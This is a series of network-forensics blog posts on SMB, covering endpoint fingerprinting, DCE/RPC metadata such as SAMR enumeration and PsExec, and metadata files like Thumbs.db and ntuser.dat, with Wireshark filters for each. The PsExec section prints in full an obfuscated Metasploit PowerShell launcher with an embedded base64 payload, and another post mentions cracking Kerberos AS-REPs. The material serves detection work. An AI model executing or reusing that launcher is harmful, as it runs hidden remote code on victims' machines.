DEV Community: Petr Stuchlík

SMB: endpoint fingerprinting

Petr Stuchlík — Mon, 02 Mar 2020 08:46:38 +0000

Welcome to another article on network forensics. We are still talking about the SMB protocol family, but this time let's focus on messages that carry hints about the connected endpoints. These hints can be used to infer knowledge about the client and server (e.g. OS version). This process is called fingerprinting.

Protocol negotiation

SMB1 NegotiateProtocolRequest (smb.cmd == 0x72) carries information about the dialects that the client understands. Similarly SMB2 NEGOTIATE request (smb2.cmd == 0) contains a list of client's dialects and SMB 3.x capabilities. These bits are specific to client implementation (or configuration) and thus can be used as part of the client's fingerprint.

The same applies for the response as well. Fields like server capabilities
(smb.server_cap), system time (smb.system.time), time zone (smb.server_timezone), boot time (smb2.boot_time) or authentication mechanisms (spnego.mechTypes) can tell a lot about the server endpoint.

Wireshark filter: smb.cmd == 0x72 or smb2.cmd == 0
PCAP sample: smb-on-windows-10.pcapng on Wireshark wiki

NTLM authentication

NTLM authentication has been long superseded by a more secure Kerberos, but in my experience it can still be found wildly in public institutions and smaller companies and sometimes even in corporate networks. From a forensic POV we are mainly interested in usernames, hostnames and NTLM hashes:

Wireshark filter: ntlmssp (or gss-api for all negotiation packets)
PCAP sample: smb-on-windows-10.pcapng on Wireshark wiki

Kerberos authentication

In case of Kerberos there are still useful metadata like realm aka. domain name (kerberos.crealm), principals aka. user/server names (kerberos.cname/kerberos.pname/kerberos.sname), auth period (kerberos.from/kerberos.til) and more.

Also, Kerberos AS-REPs (kerberos.cipher field) can sometimes be cracked to yield credentials e.g. with John the Ripper.

Wireshark filter: kerberos (or gss-api for all negotiation packets)
PCAP sample: Kerberos-CIFS.Cap at pcapr

SPOOLSS GetPrinterData

OK this is probably a really niché case, but hey, that's what forensics is all about. When using a shared network printer, MS Spool Subsystem (spoolss) is typically used over SMB/RPC stack. Once that printer is available, the OS can request various printer data using GetPrinterData function. Inspecting these data can reveal interesting bits, e.g. OS Version of the print server.

Wirehsark filter: spoolss.printerdata

If you're interested in reading more about OS/application/device fingerprinting, there's sadly not many links I could point you to. Tools like p0f or nmap can provide a good start. You can also read this post by SecurityTrails which summarizes different means of fingerprinting including SSH or TLS protocols.

References

SMB: metadata in RPC

Petr Stuchlík — Wed, 22 Jan 2020 16:58:42 +0000

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote process.

Now, in Windows networks, Named Pipes are typically used by MSRPC protocol. MSRPC is basicly an implementation of Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol used to execute functions on the remote endpoint and to transfer data. This allows MSRPC to copy files, work with remote Windows registry and manage Windows services while having the benefit of SMB authentication layer (since a named pipe is just another type of a "share"). Following services are typical examples of MSRPC traffic generators:

MS Sharing
MS Security (NLMSSP)
MS Active Directory
MS Print
MS Terminal Server
MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic and packet samples in the following sections are borrowed from their work.

Domain users enumeration

Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to samr pipe on IPC$ share. It can then invoke SAMR methods to enumerate domains (samr.opnum == 6), domain users (samr.opnum == 13), query user info (samr.opnum == 36) etc. Following filter shows packets with user information.

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution attacks. A deep dive to PsExec is can by found in this blog.

In a basic attack scenario a binary PSEXESVC.exe is transferred over SMB
protocol to a victim machine using ADMIN$ share. It is then executed remotely as a temporary service using IPC$ share. Following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is however worth noting that such a file transfer usually triggers alarms so PsExec modules like Metasploit attempt to evade it using PowerShell invocation via RPC. An example how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIfj8FkCA71WbW/aSBD+nEr9D1aFZFsl2BDaNJEqnW0gEDABHCDAoWhjr+2FtZfY6/DS63+/MdgNVZoq1w9ngbwvM7vPPvPMjt0ktDlhoeB0y8OF3
/YuhG/v3530UIQCQSr4y6ZxnxSFwkOX+BEn8skJzBaCbmt037OGdC18FaSZtlrVWIBIOL+8NJIowiE/9EtXmGtxjIMHSnAsycI
/wtjHET69eVhgmwvfhMJ96YqyB0Qzs62BbB8Lp1ropHMdZqMUXslaUcIl8e+/RXl2Wp6X6o8JorEkWtuY46DkUCrKwnc53fB2u8KSaBI7YjFzeWlMwrNKaRjGyMVdWO0Jm5j7zIlFGc4CvwjzJAqFo1OlyxyMJBGavYjZmuNEOAafUit8YkssFcKE0qLwlzTLMAySkJMAwzzHEVtZOHoiNo5LTRQ6FA+wO5e6eJ0f
/a1O0rETWPV4JBchMq+CNZmTUHzwF+WXcLOYyvAcxRWo+P7+3ft3bq6HhVpF1xN3MDg7FgS0Tmb7Nga8Uo/FZG/9VVCLggl7Is6iLXQLt1GC5bkwS6Mxm8+FAh2onduhXnx9iXJuD9Ye2d7A0GzEiDMHlyxUhU05Cax04nXN1bBLQlzbhiggdi4r6VfcY5fi/WlLuVkXUEliNoGdGqbYQzzlsSjMXrrVA8J
/+OoJoQ6ONBviFwMqCK38M5hDaCSxFZo4AJ4OfRHC4IKYcW6dCXib7572wUg0KIrjotBLIJvsomBhRLFTFLQwJtmUlnC2b4rPcM2EcmKjmOfLzeUfRGYbGiyMeZTYEDs4/K21wjZBNOWiKDSJg
/WtRbx8Y
/GXTBiIUhJ6sNITRAJGUgYsnioiAox59OWShXkrWFEcgNk+tRsUeZDIWSLsVYQ87IgvUOYaPwg6JSRn4ggjRNmijBeFEYk4XBEpuamW/hjC0f1wAGNEOIuJlCfNTN
/yVOSFDZk+erpubrxUohlLe04iDnw0IhboKMafqxaPgC3pg3JDDA2eSSukpq0vSVlbk3LLhP+QnLVY7dxpXy+aSlTb+K7Wiltms1frN5vVp2trVOVWvcXbvRY363eLhaU1B8MJn7a05i1Rl5PqbnVNdlZHcyYb5fNO361VfbNbeI47qbmud+5ag/KnBumMjb6uVlCnVk86Y32tq9W4TtbNPhn2l9cN
/jAZUTR0Fe+ufIHIphMtRmVm7lqaduWf2btrd3Tlm8520lQuxtWlVtc0I6yPGjprT
/RI6ykj5K3Yuu21zcAzNL1hEzztDxt6v9
/QteHV4rF2oXjge4d8fTyqkOnqbuBDvwEQ2opabTl4xyZ9IOmKacgbgI1nVGzfBZvaR03
/2GVxBS11pulg05g+Aq7JqtGjMH87rDBtRLt3SOtMtw1FKU96Va2pkvGVp6VLIk
/vIy1+qu1qSnnkMGf8qTtxldEdPVdqxu3KdhVFWTdrbXta3ny5Oa
/q6qMRkIA+VBzlYvhFD+FkvSfP6Y
/PB5vu9gH2GyrK6EMqHdBOwTfak+sjMbx235soin1EQSRwheeZ2mBRI7uPe4ykHpL0XKeXOAoxhdIGxS+Xu0Yps9P6cHR9Q4U61I05ZO4QmmeVX7Zk4Yeh
/Fw38qHLyykAhjR61nipg0OP+0V1c6aqcP+rm6oK5377UQ222kpHCxbTKnKg7OeN6H4jOc21gpPsIkzuw/+B1CzVfXg5byP1eew3s28iWi1mRLwY
/3ngPxH+ZzSMEeFgbsGNRfGhhP6OjUxNR58eechAKW72pJ+CNwk/7cJXyb
/ONMdWhAoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG

As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig some bits in the SMB traffic which can provide useful in endpoint fingerprinting.

References

SMB: file metadata and metadata files

Petr Stuchlík — Wed, 08 Jan 2020 08:29:55 +0000

After spending some years in network forensics field, hoarding tons of PCAPs and making cryptic notes on the topic I decided that I wanted to review it all and start sharing some concepts, interesting findings or cool ideas. I hope that someone might find them useful or just fun to follow. For the sake of sanity I am going to publish this as series.

This article will be dealing with SMB protocol and metadata hiding in it, often in plain sight. My knowledge on SMB is certainly limited and I still remember the time when "Samba" was just an easy way to share stuff on MS Windows network. In my experience this is also what many people think today, sometimes even in forensic world. The usual evidence is that files were transferred from A to B and metadata are often ignored because of the juicy payloads.

But SMB is pretty damn complex ecosystem and has much more to offer. So in this article I am going to ignore the typical file transfers.

Tools exist.

Let's focus on metadata.

Intro

In this part I will describe some sources of metadata which either accompany common SMB file transfers or get transferred as files due to OS or app-specific behavior.

For brevity of this text I am going to expect that the reader is familiar with Wireshark and basics of SMB protocol. While a lot of information about SMB protocol can be found on Wireshark wiki, I highly recommend SMB Quick Introduction by Hats Off Security as the author can really look on things from forensic POV.

The important thing for our purpose is that SMB protocol has three major versions (SMB 1-3), but version 3 is technically just SMB 2.2 so the first Wireshark filter you should be aware of is smb or smb2 which gives you all SMB packets regardless of the version.

MACB timestamps

File MACB (modification, access, change, birth) timestamps are one the basic forensic artifacts as they help to point a forensic timeline for a given case. Luckily Samba supports these timestamps in many common packets like SMB2/Create Response (downloads typically), SMB2/GetInfo Response, SMB2/SetInfo Request and SMB2/Close Response.

Note that these fields have type Date and time, so to list files created since 2020 you would use smb2.create.time > "Jan 01, 2020 00:00:00" instead of the raw value.

Wireshark filter: smb.access.time or smb2.last_access.time
PCAP sample: smb2_putty_xfer.pcap by Chris Sanders

Thumbs.db

Speaking of file metadata there can also be complimentary metadata files. These files are not always available, because their presence in the traffic is conditioned by a specific OS or application feature.

On MS systems one of the most common metadata files is Windows thumbnail cache, aka Thumbs.db. The file is notoriously known and stores thumbnail images for explorer.exe to load faster. What's not so widely known outside infosec community is that when browsing Samba shares using MS Explorer, this file gets created and transferred automatically over network (the thumbnail cache makes even more sense in this case).

Wireshark filter: smb.file contains "Thumbs.db" or smb2.filename contains "Thumbs.db"
Tool: Thumbs viewer

Outlook.NK2

Another interesting metadata file is Outlook.NK2. This is a MS Office AutoComplete list of names and email addresses. Outlook automatically updates this file according to user activity. If you happen to gaze into network where MS Office applications run over network, there's a chance that you can encounter a transfer of this file in the traffic.

Wireshark filter: smb.file contains ".NK2" or smb2.filename contains ".NK2"
Tool: NK2Edit

NTUser.dat

You can find SMB file transfers of ntuser.dat when Microsoft Roaming User Profiles are deployed. Citing MS docs:

Roaming User Profiles redirects user profiles to a file share so that users receive the same operating system and application settings on multiple computers.

This means that all user profile data are transferred over network including MS Registry Hives such as ntuser.dat. This file contains anything that typically resides in HKEY_CURRENT_USER, e.g. mount points, recent documents, typed URLs, connected wireless APs or remotely connected systems.

Wireshark filter: smb.file contains "ntuser.dat" or smb2.filename contains "ntuser.dat"
Tool: RegRipper, Regipy

.DS_STORE

On MacOS a .DS_STORE file is a hidden attribute store which can be automatically created by MacOS Finder in any folder (regardless of file system or network share) based on user activity.

The file has recently gained some attention in infosec community, because it can contain sensitive information. With the fact that it is hidden by default in the Finder, it can easily lead to data leaks. What sensitive information you ask? For example:

all file and directory names in the corresponding folder
selected items in the folder
trash put backs

Especially the first case is interesting if you find a .DS_STORE on a website. I recommend a SANS talk by Nicole Ibrahim and a dissection guide by gehaxelt for more information on the topic.

Wireshark filter: smb.file contains ".DS_STORE" or smb2.filename contains ".DS_STORE"
Tool: ds_store.go, ds_store_parser.py

That's it for today. Do you know of any other forensic metadata sources in SMB protocol? Let me know.